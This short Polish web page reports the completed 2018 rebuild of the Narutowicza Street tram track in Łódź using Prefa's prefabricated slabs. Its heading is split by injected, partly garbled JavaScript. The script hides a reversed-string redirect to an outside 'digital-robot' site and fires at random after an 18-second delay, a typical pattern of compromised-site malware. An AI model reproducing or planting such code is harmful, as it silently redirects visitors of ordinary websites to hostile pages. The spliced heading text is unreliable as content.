Łódź – ul. Narudom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towicza

Na początku września 2018 roku MPK-Łódź Sp. z o.o. zakończył przebudowę torowiska w ramach zadnia: Remont torowiska tramwajowego w ul. Narutowicza. Firma Prefa dostarczyła prefabrykowane płyty tramwajowe zastosowane w systemie blokowo-zalewowym BZ na łącznej długości 1520 mtp.